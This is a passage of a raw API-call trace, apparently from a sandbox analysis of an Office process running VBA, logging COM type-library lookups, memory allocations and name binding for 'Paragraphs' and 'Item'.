ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.661] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x2040b0, pDummy=0x6 | out: ppTypeAttr=0x2040b0, pDummy=0x6) returned 0x0 [0045.661] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x412) returned 0x81f9310 [0045.661] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.661] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.661] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.661] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.661] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2049c8, pDummy=0x0 | out: ppTypeAttr=0x2049c8, pDummy=0x0) returned 0x0 [0045.661] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.662] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.662] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.662] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.662] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.662] GetCurrentProcess () returned 0xffffffffffffffff [0045.662] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.662] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.662] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x203f60, pDummy=0x0 | out: ppTypeAttr=0x203f60, pDummy=0x0) returned 0x0 [0045.662] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.662] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x412) returned 0x81f9760 [0045.662] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x813b9c0 [0045.662] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204ae8 | out: ppvObject=0x204ae8*=0x0) returned 0x80004002 [0045.662] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204af0 | out: ppvObject=0x204af0*=0x0) returned 0x80004002 [0045.662] ITypeInfo:GetTypeComp (in: This=0x7f723a0, ppTComp=0x204af8 | out: ppTComp=0x204af8*=0x7f723a8) returned 0x0 [0045.662] IMalloc:Alloc (This=0x7feff045380, cb=0x38) returned 0x7d55cd0 [0045.662] IUnknown:AddRef (This=0x7f723a8) returned 0x5 [0045.662] IUnknown:Release (This=0x7f723a8) returned 0x4 [0045.662] IMalloc:Realloc (This=0x7feff045380, pv=0x8122c10, cb=0xa0) returned 0x81968e0 [0045.663] IUnknown:Release (This=0x7f723a0) returned 0x3 [0045.663] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f0102, cbMultiByte=11, lpWideCharStr=0x2045e0, cchWideChar=12 | out: lpWideCharStr="Paragraphs") returned 11 [0045.663] ITypeComp:RemoteBind (in: This=0x7f723a8, szName="Paragraphs", lHashVal=0x1066f9, wFlags=0x3, ppTInfo=0x204598, pDescKind=0x2045ac, ppFuncDesc=0x2045b0, ppVarDesc=0x7fee3cec82c, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204598*=0x7f723a0, pDescKind=0x2045ac*=1, ppFuncDesc=0x2045b0, ppVarDesc=0x7fee3cec82c, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.663] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x2045a0, pDummy=0x1 | out: ppTypeAttr=0x2045a0, pDummy=0x1) returned 0x0 [0045.663] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.663] ITypeInfo:GetRefTypeInfo (in: This=0x7f723a0, hreftype=0x6e80, ppTInfo=0x203e58 | out: ppTInfo=0x203e58*=0x7f7a9b0) returned 0x0 [0045.663] IUnknown:QueryInterface (in: This=0x7f7a9b0, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204028 | out: ppvObject=0x204028*=0x0) returned 0x80004002 [0045.663] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7a9b0, ppTypeAttr=0x203ea8, pDummy=0x10 | out: ppTypeAttr=0x203ea8, pDummy=0x10) returned 0x0 [0045.663] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7a9b0) returned 0x0 [0045.663] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7a9b0, index=0xffffffff, pRefType=0x203e8c | out: pRefType=0x203e8c*=0xfffffffe) returned 0x0 [0045.663] ITypeInfo:GetRefTypeInfo (in: This=0x7f7a9b0, hreftype=0xfffffffe, ppTInfo=0x203e58 | out: ppTInfo=0x203e58*=0x7f7aa08) returned 0x0 [0045.663] IUnknown:Release (This=0x7f7a9b0) returned 0x1 [0045.663] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203bb0 | out: ppvObject=0x203bb0*=0x0) returned 0x80004002 [0045.663] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203ba0 | out: ppvObject=0x203ba0*=0x0) returned 0x80004002 [0045.663] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203ba8 | out: ppvObject=0x203ba8*=0x0) returned 0x80004002 [0045.663] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x203bd8, pDummy=0x10 | out: ppTypeAttr=0x203bd8, pDummy=0x10) returned 0x0 [0045.663] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.663] IUnknown:AddRef (This=0x7f7aa08) returned 0x2 [0045.663] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203d50 | out: ppvObject=0x203d50*=0x0) returned 0x80004002 [0045.663] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203d48 | out: ppvObject=0x203d48*=0x0) returned 0x80004002 [0045.663] IUnknown:Release (This=0x7f7aa08) returned 0x1 [0045.663] IMalloc:Realloc (This=0x7feff045380, pv=0x8061d00, cb=0x400) returned 0x3ea42f0 [0045.663] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x204350, pDummy=0x0 | out: ppTypeAttr=0x204350, pDummy=0x0) returned 0x0 [0045.663] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.663] IUnknown:Release (This=0x7f7aa08) returned 0x1 [0045.664] IUnknown:Release (This=0x7f7aa08) returned 0x1 [0045.664] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x204400 | out: ppvObject=0x204400*=0x7f723a0) returned 0x0 [0045.664] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x7f723a0, memid=16, invkind=2, pFuncIndex=0x204440 | out: pFuncIndex=0x204440*=0x16) returned 0x0 [0045.664] ITypeInfo2:GetFuncCustData (in: This=0x7f723a0, index=0x16, GUID=0x7fee4043758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x204458 | out: pVarVal=0x204458*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x204500, varVal2=0x80f6a50)) returned 0x0 [0045.664] IUnknown:Release (This=0x7f723a0) returned 0x4 [0045.664] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2043b8 | out: ppvObject=0x2043b8*=0x0) returned 0x80004002 [0045.664] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4042aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204290 | out: ppvObject=0x204290*=0x0) returned 0x80004002 [0045.664] IUnknown:Release (This=0x7f7aa08) returned 0x1 [0045.664] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2043b8 | out: ppvObject=0x2043b8*=0x0) returned 0x80004002 [0045.664] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4042aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204290 | out: ppvObject=0x204290*=0x0) returned 0x80004002 [0045.664] IUnknown:Release (This=0x7f7aa08) returned 0x1 [0045.664] IUnknown:AddRef (This=0x7f723a0) returned 0x5 [0045.664] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.664] IUnknown:Release (This=0x7f723a0) returned 0x4 [0045.664] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204658 | out: ppvObject=0x204658*=0x0) returned 0x80004002 [0045.664] IUnknown:AddRef (This=0x7f723a0) returned 0x5 [0045.664] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2045e0 | out: ppvObject=0x2045e0*=0x0) returned 0x80004002 [0045.664] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2045b0 | out: ppvObject=0x2045b0*=0x0) returned 0x80004002 [0045.664] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2045a0 | out: ppvObject=0x2045a0*=0x0) returned 0x80004002 [0045.664] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2045a8 | out: ppvObject=0x2045a8*=0x0) returned 0x80004002 [0045.664] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x2045d8, pDummy=0x10 | out: ppTypeAttr=0x2045d8, pDummy=0x10) returned 0x0 [0045.664] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.664] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.664] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.664] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c8 | out: ppvObject=0x2047c8*=0x0) returned 0x80004002 [0045.664] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c0 | out: ppvObject=0x2047c0*=0x0) returned 0x80004002 [0045.664] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.664] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x204948, pDummy=0x3b0120e | out: ppTypeAttr=0x204948, pDummy=0x3b0120e*=0x0) returned 0x0 [0045.664] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.665] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.665] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.665] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.665] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.665] GetCurrentProcess () returned 0xffffffffffffffff [0045.665] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.665] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.665] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x203ee0, pDummy=0x0 | out: ppTypeAttr=0x203ee0, pDummy=0x0) returned 0x0 [0045.665] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.665] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2046b0 | out: ppvObject=0x2046b0*=0x0) returned 0x80004002 [0045.665] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204680 | out: ppvObject=0x204680*=0x0) returned 0x80004002 [0045.665] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204670 | out: ppvObject=0x204670*=0x0) returned 0x80004002 [0045.665] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204678 | out: ppvObject=0x204678*=0x0) returned 0x80004002 [0045.665] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x2046a8, pDummy=0x10 | out: ppTypeAttr=0x2046a8, pDummy=0x10) returned 0x0 [0045.665] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.665] IUnknown:AddRef (This=0x7f7aa08) returned 0x3 [0045.665] IUnknown:Release (This=0x7f7aa08) returned 0x2 [0045.665] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204808 | out: ppvObject=0x204808*=0x0) returned 0x80004002 [0045.665] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204810 | out: ppvObject=0x204810*=0x0) returned 0x80004002 [0045.665] ITypeInfo:GetTypeComp (in: This=0x7f7aa08, ppTComp=0x204818 | out: ppTComp=0x204818*=0x7f7aa10) returned 0x0 [0045.665] IMalloc:Alloc (This=0x7feff045380, cb=0x38) returned 0x7d55d10 [0045.665] IUnknown:AddRef (This=0x7f7aa10) returned 0x6 [0045.665] IUnknown:Release (This=0x7f7aa10) returned 0x5 [0045.665] IMalloc:Realloc (This=0x7feff045380, pv=0x81968e0, cb=0xb0) returned 0x81e44a0 [0045.665] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.665] IUnknown:Release (This=0x7f7aa08) returned 0x3 [0045.666] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204458 | out: ppvObject=0x204458*=0x0) returned 0x80004002 [0045.666] IUnknown:AddRef (This=0x7f7aa08) returned 0x5 [0045.666] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204450, pDummy=0x10 | out: ppTypeAttr=0x204450, pDummy=0x10) returned 0x0 [0045.666] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.666] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7aa08, index=0x0, pRefType=0x204448 | out: pRefType=0x204448*=0x3) returned 0x0 [0045.666] ITypeInfo:GetRefTypeInfo (in: This=0x7f7aa08, hreftype=0x3, ppTInfo=0x204460 | out: ppTInfo=0x204460*=0x8137308) returned 0x0 [0045.666] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.666] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204450, pDummy=0x204428 | out: ppTypeAttr=0x204450, pDummy=0x204428*=0x3) returned 0x0 [0045.666] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.666] IUnknown:Release (This=0x8137308) returned 0x1 [0045.666] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7aa08, memid=0, refPtrFlags=0x2044d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x8 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x8) returned 0x0 [0045.666] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Item", cchWideChar=5, lpMultiByteStr=0x2043e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Item", lpUsedDefaultChar=0x0) returned 5 [0045.666] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Item") returned 0x107ad7 [0045.666] strcpy_s (in: _Dst=0x204240, _DstSize=0x5, _Src="Item" | out: _Dst="Item") returned 0x0 [0045.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x204240, cbMultiByte=5, lpWideCharStr=0x204090, cchWideChar=5 | out: lpWideCharStr="Item") returned 5 [0045.666] IUnknown:AddRef (This=0x7edf740) returned 0xc [0045.666] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="Item", lHashVal=0x107ad7, pfName=0x204160, pBstrLibName=0x204090 | out: pfName=0x204160*=1, pBstrLibName=0x204090) returned 0x0 [0045.666] IUnknown:Release (This=0x7edf740) returned 0xb [0045.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Item", cchWideChar=-1, lpMultiByteStr=0x204240, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Item", lpUsedDefaultChar=0x0) returned 5 [0045.666] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Item") returned 0x107ad7 [0045.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f04de, cbMultiByte=5, lpWideCharStr=0x204220, cchWideChar=6 | out: lpWideCharStr="Item") returned 5 [0045.666] ITypeComp:RemoteBind (in: This=0x7f7aa10, szName="Item", lHashVal=0x107ad7, wFlags=0x3, ppTInfo=0x2041d8, pDescKind=0x2041ec, ppFuncDesc=0x2041f0, ppVarDesc=0x204240, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x2041d8*=0x7f7aa08, pDescKind=0x2041ec*=1, ppFuncDesc=0x2041f0, ppVarDesc=0x204240, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.666] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x2041e0, pDummy=0x1 | out: ppTypeAttr=0x2041e0, pDummy=0x1) returned 0x0 [0045.666] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.666] ITypeInfo:GetRefTypeInfo (in: This=0x7f7aa08, hreftype=0x6f00, ppTInfo=0x203a98 | out: ppTInfo=0x203a98*=0x7f7aa60) returned 0x0 [0045.667] IUnknown:QueryInterface (in: This=0x7f7aa60, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203c68 | out: ppvObject=0x203c68*=0x0) returned 0x80004002 [0045.667] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa60, ppTypeAttr=0x203ae8, pDummy=0x10 | out: ppTypeAttr=0x203ae8, pDummy=0x10) returned 0x0 [0045.667] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa60) returned 0x0 [0045.667] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7aa60, index=0xffffffff, pRefType=0x203acc | out: pRefType=0x203acc*=0xfffffffe) returned 0x0 [0045.667] ITypeInfo:GetRefTypeInfo (in: This=0x7f7aa60, hreftype=0xfffffffe, ppTInfo=0x203a98 | out: ppTInfo=0x203a98*=0x7f7aab8) returned 0x0 [0045.667] IUnknown:Release (This=0x7f7aa60) returned 0x1 [0045.667] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2037f0 | out: ppvObject=0x2037f0*=0x0) returned 0x80004002 [0045.667] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2037e0 | out: ppvObject=0x2037e0*=0x0) returned 0x80004002 [0045.667] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2037e8 | out: ppvObject=0x2037e8*=0x0) returned 0x80004002 [0045.667] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x203818, pDummy=0x10 | out: ppTypeAttr=0x203818, pDummy=0x10) returned 0x0 [0045.667] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.667] IUnknown:AddRef (This=0x7f7aab8) returned 0x2 [0045.667] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203990 | out: ppvObject=0x203990*=0x0) returned 0x80004002 [0045.667] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203988 | out: ppvObject=0x203988*=0x0) returned 0x80004002 [0045.667] IUnknown:Release (This=0x7f7aab8) returned 0x1 [0045.667] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x203f90, pDummy=0x0 | out: ppTypeAttr=0x203f90, pDummy=0x0) returned 0x0 [0045.667] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.667] IUnknown:Release (This=0x7f7aab8) returned 0x1 [0045.667] IUnknown:Release (This=0x7f7aab8) returned 0x1 [0045.667] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x204040 | out: ppvObject=0x204040*=0x7f7aa08) returned 0x0 [0045.667] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x7f7aa08, memid=0, invkind=1, pFuncIndex=0x204080 | out: pFuncIndex=0x204080*=0x40) returned 0x0 [0045.667] ITypeInfo2:GetFuncCustData (in: This=0x7f7aa08, index=0x40, GUID=0x7fee4043758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x204098 | out: pVarVal=0x204098*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x204140, varVal2=0x80f6a50)) returned 0x0 [0045.667] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.667] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203ff8 | out: ppvObject=0x203ff8*=0x0) returned 0x80004002 [0045.667] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4042aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203ed0 | out: ppvObject=0x203ed0*=0x0) returned 0x80004002 [0045.668] IUnknown:Release (This=0x7f7aab8) returned 0x1 [0045.668] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, 